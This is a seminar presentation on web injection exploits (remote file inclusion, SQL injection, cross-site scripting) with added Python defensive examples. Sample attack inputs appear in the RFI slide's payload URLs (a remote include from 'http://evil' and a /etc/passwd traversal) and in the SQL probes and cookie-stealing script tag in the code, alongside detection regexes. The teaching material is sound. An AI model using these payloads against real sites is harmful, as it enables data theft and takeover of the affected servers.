8/8/2019 Master Seminar: Injection Exploits

Web security -- Injection exploits
Karol Stępniewski

Presentation topics
What are injection exploits?
Why are they dangerous?
Basic types of injection exploits:
  Remote file inclusion
  Cross-site scripting
  SQL injection
  Other
Examples of securing applications against exploits

Injection exploit: what's that?
What is an exploit?
A piece of software or a sequence of commands which causes unintended behaviour to occur in computer software.
Usually based on bugs or other vulnerabilities which exist in a computer application.
Possible effects of using an exploit:
  Privilege escalation
  Denial of service
  Gaining control of the system

Injection exploit: what's that?
An injection exploit uses some input or data-entry feature to introduce data or code that subverts the intended operation of the system.
Usually these exploits abuse vulnerabilities resulting from insufficient validation of input data.
The way the code is injected classifies exploits into categories.
1st place in the OWASP Top 10 ranking of web application exploits.
Used to attack IBM, Yahoo, Apple, ...

Remote file inclusion
Allows an attacker to include a remote file, usually through a script on the web server.
Most often found on websites based on scripting languages like PHP, ASP etc.
Can lead to:
  Code execution on the web server
  Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)
  Denial of Service (DoS)
  Data theft/manipulation

Remote file inclusion -- example
Trivial example: we want to include a file based on which colour the user has chosen in a form. We could use the following construction (PHP and HTML code). We give the user only two options, red and blue. The form is passed to the server using the GET method.

Remote file inclusion -- example
If the user finds out how to change the possible values (which is relatively simple with the GET method), he can provide his own file to include, or can even tell the server to include its own files, which normally shouldn't be available outside the server system.
Examples:
  /vulnerable.php?COLOR=http://evil/exploit? -- injects a remotely hosted file containing an exploit.
  /vulnerable.php?COLOR=../../../../../../../../etc/passwd%00 -- allows an attacker to read the contents of the passwd file on a UNIX system (directory traversal).
%00 is a NULL meta-character which removes the .php suffix that is added in the script.

Remote file inclusion
RFI is a very common exploit in different CMSs and other applications which provide plugin systems, downloading and uploading of many files, etc.
Even many commercial CMSs were vulnerable to RFI.

Remote file inclusion -- how to defend
Remove instructions which include files whose names are taken directly from variables; use a prepared set of possible files (chosen with conditional instructions).
Read privileges on the server only for the files needed by the website.
On some server systems (e.g. BSD-like) use jails for the server filesystem.
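The first defence above (a prepared set of files chosen by a lookup, never by the raw parameter) as an added example. The slides' own construction is PHP; this Python version is not part of the presentation. The function names, the two template files and the detection pattern are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Constructed allowlist: the only two files the page may ever include,
# keyed by the form value. The request value itself is never used as a path.
ALLOWED_COLORS = {"red": "red.php", "blue": "blue.php"}


def unsafe_include_path(base_dir, color):
    """The vulnerable construction from the example slide, in Python form:
    the file name is concatenated from the request parameter, so '../'
    sequences and 'http://' prefixes pass straight through."""
    return base_dir + "/" + color + ".php"


def safe_include_path(base_dir, color):
    """Allowlist lookup plus a containment check (defence in depth)."""
    if color not in ALLOWED_COLORS:
        raise ValueError("unknown color: %r" % color)
    base = Path(base_dir).resolve()
    target = (base / ALLOWED_COLORS[color]).resolve()
    if base not in target.parents:
        raise ValueError("resolved path escapes the template directory")
    return str(target)


def render_page(base_dir, color):
    """Read the chosen template; raises instead of including anything else."""
    with open(safe_include_path(base_dir, color), encoding="utf-8") as f:
        return f.read()


def looks_like_inclusion_attack(color):
    """Detection helper for request logs: directory traversal, a URL scheme
    or a NUL byte (raw or URL-encoded) in a parameter that should be a word."""
    pattern = r"\.\./|\.\.\\|[a-z]+://|\x00|%00"
    return re.search(pattern, color, re.IGNORECASE) is not None


def make_template_dir():
    """Create a throwaway directory holding the two allowed templates
    (constructed data for the example)."""
    d = tempfile.mkdtemp()
    Path(d, "red.php").write_text("<p style='color:red'>red page</p>", encoding="utf-8")
    Path(d, "blue.php").write_text("<p style='color:blue'>blue page</p>", encoding="utf-8")
    return d


if __name__ == "__main__":
    d = make_template_dir()
    print(render_page(d, "red"))
    for value in ("red", "../../../../etc/passwd\x00", "http://evil/exploit?"):
        print(repr(value), "->", "flagged" if looks_like_inclusion_attack(value) else "ok")
```

The containment check is redundant while the allowlist holds, but it keeps the function safe if someone later adds a template entry with a path in it; the detection helper is for alerting on requests, not a substitute for the allowlist.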

SQL injection: what's that?
The most popular injection exploit.
Every application which uses an SQL-based database might be vulnerable.
However, if there is no SQL there is no danger.
Happens when user input is not properly validated and escaped.

SQL injection -- example
We want to create a simple login form. The user provides a login and a password, and we check if such a user exists in the database. However, the user provides data which is a control instruction for the database. The user gets logged in without providing the correct password.

SQL injection -- possible effects
What could happen?
  Illegal access to the application
  Access to all data in the database
  Denial of service
  Ability to modify data
  Ability to execute code on the server
An extremely dangerous exploit.

How to defend against SQL injection -- prepared statements
Separates data from the statement.
The statement is compiled and might be used many times. Before compilation we place markers instead of data values.
After compilation we bind the data to the statement, replacing the markers with data values.
It's not always possible to use such statements (special types of data).

How to defend against SQL injection -- prepared statements
Example

How to defend against SQL injection -- escaping
Every special character in the provided data is replaced with an escape sequence (e.g. ' is replaced with '' or \').
It's still error-prone:
  Escape sequences depend on the database used.
  It's based on blacklisting special characters, which is not an optimal solution.

How to defend against SQL injection -- escaping
Example of escaping in PHP code using the built-in function for the MySQL database.
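The login check from the SQL injection example, as an added example covering both the prepared-statement slides and the escaping slides (the presentation's own PHP/MySQL examples are not reproduced). It uses Python's sqlite3 module with a constructed in-memory users table; the function names are assumptions. sqlite3 marks bound values with ?, whereas MySQL drivers typically use %s, and the hand-written escape function below is deliberately the SQLite rule only, to show why escaping must come from the database driver (in PHP for MySQL that is mysqli_real_escape_string).

```python
import sqlite3


def make_db():
    """Constructed sample database: two users with plaintext passwords
    (only to keep the example short; real systems store password hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (login, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, login, password):
    """User input is concatenated into the statement, so the input can change
    the statement's structure (the scenario from the example slide)."""
    sql = ("SELECT COUNT(*) FROM users WHERE login = '%s' AND password = '%s'"
           % (login, password))
    return conn.execute(sql).fetchone()[0] > 0


def escape_sqlite(value):
    """Hand-written escaping, SQLite style: only the quote is special inside a
    string literal. MySQL needs more (backslash, NUL, ...), which is why the
    escape function must come from the database driver, never from memory."""
    return str(value).replace("'", "''")


def login_escaped(conn, login, password):
    """Escaping works here because both values sit inside quoted literals."""
    sql = ("SELECT COUNT(*) FROM users WHERE login = '%s' AND password = '%s'"
           % (escape_sqlite(login), escape_sqlite(password)))
    return conn.execute(sql).fetchone()[0] > 0


def logins_by_id_escaped(conn, raw_id):
    """The error-prone part: the id is not inside quotes, so quote-escaping
    changes nothing and the WHERE clause can still be rewritten."""
    sql = "SELECT login FROM users WHERE id = %s ORDER BY id" % escape_sqlite(raw_id)
    return [row[0] for row in conn.execute(sql)]


def login_prepared(conn, login, password):
    """Prepared statement: the SQL text with ? markers is parsed first, the
    values are bound afterwards and are only ever treated as data."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE login = ? AND password = ?",
        (login, password)).fetchone()
    return row[0] > 0


def logins_by_id_prepared(conn, raw_id):
    """With a bound parameter the whole input is compared as one value."""
    rows = conn.execute("SELECT login FROM users WHERE id = ? ORDER BY id", (raw_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"   # constructed input: a quote followed by SQL, not a password
    print("vulnerable:", login_vulnerable(db, "alice", probe))
    print("escaped:   ", login_escaped(db, "alice", probe))
    print("prepared:  ", login_prepared(db, "alice", probe))
    print("escaped, unquoted id:", logins_by_id_escaped(db, "1 OR 1=1"))
    print("prepared, same input:", logins_by_id_prepared(db, "1 OR 1=1"))
```

The first three functions show the same query with the same input: concatenation lets the input close the literal and add a condition, escaping keeps it inside the literal, and the prepared statement never parses it at all. The id lookups show the blacklisting problem from the slide: escaping only protects values that are inside quotes, so a numeric column compared without quotes stays injectable, while the bound parameter is safe in both contexts.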

How to defend against SQL injection -- stored procedures
SQL statements are moved from the script to the database and saved as a procedure.
The procedure is invoked with the data as parameters and has a defined output.
It's not enough: we still need to separate data from the statement inside the procedure.
Main rule: do not mix data with code.

How to defend against SQL injection -- stored procedures
Example of a safe stored procedure in a MySQL database.
A prepared statement is used here as well.

How to defend against SQL injection -- other important things
Validating data: check if the age is a number, the city name is a simple string, etc.
Filtering bad data, e.g. removing letters from a phone number.
Executing statements on an account with the minimal privileges needed for that operation.
Regular updates of the database system.
Good database design.
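The validating and filtering points above as an added Python example (not from the presentation): one validator per field type named on the slide, and a form-level function that collects either a cleaned value or an error for each field. The field names, regular expressions and length limits are assumptions chosen for the illustration.

```python
import re

# Constructed rules: age is 1-3 digits, a city name is ASCII letters plus a
# few separators. Real applications would use Unicode-aware classes instead.
AGE_RE = re.compile(r"^[0-9]{1,3}$")
CITY_RE = re.compile(r"^[A-Za-z][A-Za-z .'-]{0,63}$")


def validate_age(raw):
    """Age must be a number: reject anything else before it reaches SQL."""
    if not AGE_RE.match(raw.strip()):
        raise ValueError("age must be a number")
    age = int(raw.strip())
    if not 0 <= age <= 150:
        raise ValueError("age out of range")
    return age


def validate_city(raw):
    """City name: a simple string; anything outside the allowed set is rejected."""
    value = raw.strip()
    if not CITY_RE.match(value):
        raise ValueError("city contains disallowed characters")
    return value


def clean_phone(raw):
    """Filtering rather than rejecting: drop everything except digits and a
    leading +, then sanity-check the length."""
    digits = re.sub(r"[^0-9]", "", raw)
    if not 6 <= len(digits) <= 15:
        raise ValueError("phone number has wrong length")
    return ("+" if raw.strip().startswith("+") else "") + digits


def validate_profile(form):
    """Validate a whole form; returns (clean_values, errors), both dicts keyed
    by field name, so the caller can refuse the request if errors is non-empty."""
    clean, errors = {}, {}
    for field, fn in (("age", validate_age), ("city", validate_city), ("phone", clean_phone)):
        try:
            clean[field] = fn(form.get(field, ""))
        except ValueError as e:
            errors[field] = str(e)
    return clean, errors


if __name__ == "__main__":
    good = {"age": "42", "city": "Warsaw", "phone": "+48 (22) 123-45-67"}   # constructed
    bad = {"age": "42 OR 1=1", "city": "Warsaw'; DROP TABLE users;--", "phone": "abc"}
    print(validate_profile(good))
    print(validate_profile(bad))
```

Validation is a complement to prepared statements, not a replacement: it keeps nonsensical values out of the database and gives the user a clear error, while the prepared statement is what guarantees the value cannot be parsed as SQL.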

Cross-site scripting (XSS)
An XSS exploit is based on injecting code into a website, which is then displayed to other users.
Web browser security policies do not allow scripts to work on data other than data coming from the same server the script comes from.
When code is injected into the website, it works on the same data as the website does.
The attacker is able to grab session data, cookies, and other important information.

Cross-site scripting (XSS) -- exploit scenarios
Internet boards: a user adds a new post which includes a script with malicious code. If the content of the new post is not properly validated, every user who reads the post also executes the script, which might steal his cookies, session data, etc.
Also possible using the RFI method.

Cross-site scripting (XSS) -- how to defend
Validating and filtering the data:
  No strange characters are allowed.
  All control symbols are removed.
Escaping HTML tags and JS symbols:
  Before displaying, the website should replace control symbols with entities.
Defending on the client side:
  Block malicious scripts (using NoScript-like add-ons, etc.).
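The server-side defence for the board scenario (replace control symbols with entities before displaying) as an added Python example, not part of the presentation. It uses the standard html module; the post renderer, the link helper and the detection helper are hypothetical names, and the post content is constructed.

```python
import html
import re


def render_post(author, body):
    """Output encoding: every HTML-significant character (< > & " ') becomes an
    entity, so injected markup is shown as text rather than parsed by the
    browser. Line breaks are converted only after escaping, so the only <br>
    tags in the result are ours."""
    safe_author = html.escape(author, quote=True)
    safe_body = html.escape(body, quote=True).replace("\n", "<br>\n")
    return '<div class="post"><b>%s</b><p>%s</p></div>' % (safe_author, safe_body)


def render_link(label, url):
    """Attribute context: entity-encoding alone is not enough for an href,
    because a javascript: URL contains no special characters at all. Restrict
    the scheme as well and fall back to a harmless fragment."""
    if not re.match(r"^https?://", url, re.IGNORECASE):
        url = "#"
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True),
                                   html.escape(label, quote=True))


def suspicious_markup(text):
    """Heuristic for logging or alerting only: does the submitted text contain
    something that looks like a tag, an inline event handler or a script URL?
    Encoding on output is the real defence; this just surfaces attempts."""
    pattern = r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:"
    return re.search(pattern, text, re.IGNORECASE) is not None


if __name__ == "__main__":
    # Constructed forum post: a user submits a script instead of a message.
    body = "hello\n<script>steal(document.cookie)</script>"
    print(render_post("mallory", body))
    print(render_link("home", "https://example.org/?a=1&b=2"))
    print(render_link("home", "javascript:void(0)"))
    print("suspicious:", suspicious_markup(body))
```

The escaping is applied at the moment of display, which is the rule from the slide: the stored post keeps the user's text unchanged, and every output context (element text, attribute value, URL) gets the encoding appropriate to it.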

Other injection exploits
Frame injection: only on IE 5, 6, 7.
HTTP header injection.
E-mail injection: might be used to anonymously send e-mails via forms on a public website.

That's all. Thank you!